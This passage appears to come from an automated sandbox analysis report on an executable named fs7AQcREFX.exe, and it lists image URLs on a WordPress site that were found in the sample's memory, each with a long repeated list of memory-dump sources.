00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i2-300x300.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i2.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i3-150x150.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i3-300x300.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i3.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i5-150x150.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i5-300x300.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/03/i5.png
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComBLACK-1.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComBLUE-1.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComSKIN-1.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/ComSTROKe-1.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_1.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_2.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_3.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_4.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2023/04/Header_5.jpg
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 